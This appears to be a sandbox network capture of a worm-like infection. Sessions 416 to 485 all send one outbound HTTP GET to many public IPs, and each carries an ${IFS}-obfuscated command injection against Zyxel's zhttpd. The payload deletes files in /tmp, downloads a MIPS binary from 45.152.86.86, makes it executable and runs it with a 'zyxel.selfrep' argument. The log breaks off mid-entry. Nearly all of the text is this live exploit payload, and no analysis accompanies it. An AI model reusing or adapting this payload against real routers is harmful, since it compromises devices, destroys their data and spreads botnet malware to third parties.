                              Session IDSource IPSource PortDestination IPDestination Port
                              416192.168.2.133476293.126.155.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488452911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              417192.168.2.1360184103.252.37.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488504887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              418192.168.2.134359039.190.213.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488543034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              419192.168.2.1337804158.6.184.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488609076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              420192.168.2.13476164.17.159.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488630056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              421192.168.2.1343882189.225.233.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488677025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              422192.168.2.1346636170.201.35.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488729000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              423192.168.2.134503080.80.104.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488773108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              424192.168.2.1336908134.119.248.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488830090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              425192.168.2.1354030144.236.164.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488874912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              426192.168.2.1343006144.100.155.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488935947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              427192.168.2.1339094134.221.37.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488977909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              428192.168.2.133641442.123.165.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.489031076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              429192.168.2.133527623.144.47.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.489073038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              430192.168.2.1353284180.159.33.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.489120007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              431192.168.2.134519684.156.240.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.489162922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              432192.168.2.135829020.115.36.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.489187002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              433192.168.2.1354292168.102.107.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492780924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              434192.168.2.1334224208.215.222.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492799997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              435192.168.2.1356748116.203.168.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492860079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              436192.168.2.134756284.69.129.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492906094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              437192.168.2.134313280.114.118.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492944002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              438192.168.2.133387854.37.199.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.492981911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              439192.168.2.1339940107.39.182.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479427099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              440192.168.2.1355386178.80.132.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479496956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              441192.168.2.1341036118.85.10.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479600906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              442192.168.2.133895060.182.118.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479641914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              443192.168.2.1358826191.240.65.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479717016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              444192.168.2.134149013.25.36.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479743958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              445192.168.2.134917662.114.228.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479787111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              446192.168.2.1345384174.41.146.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479835033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              447192.168.2.1339072207.46.116.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479886055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              448192.168.2.135708090.126.122.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479912043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              449192.168.2.1351418124.196.182.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479937077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              450192.168.2.1337960211.46.83.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.479968071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              451192.168.2.1360140166.13.67.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480006933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              452192.168.2.1335506203.220.37.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480055094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              453192.168.2.1358480117.144.16.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480115891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              454192.168.2.1332814150.36.133.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480144978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              455192.168.2.1355318147.169.254.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480206966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              456192.168.2.1344992120.10.212.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480233908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              457192.168.2.133528452.194.215.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480278015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              458192.168.2.1336462111.165.239.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480309010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              459192.168.2.1338290128.61.133.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480360985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              460192.168.2.1354998163.171.86.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480386019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              461192.168.2.1335588180.127.77.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480422020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              462192.168.2.1360838160.233.129.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480490923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              463192.168.2.1351126191.192.221.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480520010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              464192.168.2.1349668201.179.239.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480552912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              465192.168.2.133512638.241.179.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480607986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              466192.168.2.1347724149.25.195.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480647087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              467192.168.2.135965823.4.162.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480705023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              468192.168.2.1356158153.117.250.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480730057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              469192.168.2.1342826115.20.190.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480762005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              470192.168.2.1351764177.36.238.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480803967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              471192.168.2.1352880221.151.128.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480844975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              472192.168.2.133380478.15.100.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480911970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              473192.168.2.1340076107.107.166.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480947018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              474192.168.2.133927042.141.250.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.480981112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              475192.168.2.133679078.35.77.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481025934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              476192.168.2.1339620172.56.206.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481054068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              477192.168.2.135760252.204.163.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481112957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              478192.168.2.1336052210.220.22.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481132984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              479192.168.2.1347802187.30.177.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481178045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              480192.168.2.1335756129.214.8.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481236935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              481192.168.2.1343258115.189.35.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481278896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              482192.168.2.1340320131.226.187.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481307983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              483192.168.2.133775846.190.217.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481358051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              484192.168.2.1346078129.78.12.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481395960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              485192.168.2.1357748138.109.120.172443
                              TimestampBytes transferredDirectionData
